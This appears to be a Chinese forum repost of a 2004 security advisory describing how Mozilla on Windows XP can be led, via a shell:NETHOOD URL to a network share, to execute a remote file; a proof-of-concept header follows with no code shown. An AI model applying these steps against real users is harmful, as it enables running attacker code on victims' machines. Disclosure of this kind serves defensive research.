- 主题
- 0
- 积分
- 0
- 贝壳
- 0 个
- 来自
- 云南曲靖
- 注册时间
- 2006-11-19
- 最后登录
- 2006-11-19
|
远程运行可执行程序的shell代码
| [START] Advisory
TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709
PROCESS
-------
Victim visits a shared folder named "shared" on a server named "X-6487ohu4s6x0p".
This will create a shortcut named "shared on X-6487ohu4s6x0p" in the folder at "shell:NETHOOD"
At last, make MOZILLA request the following URL:
shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe
A file named "fileid.exe" in the "shared" folder will be executed.
REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.
WINDOWS support "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research , and Cheng Peng Su for his
original discovery.
#########################
[START] PROOF OF CONCEPT
#######################
|
|
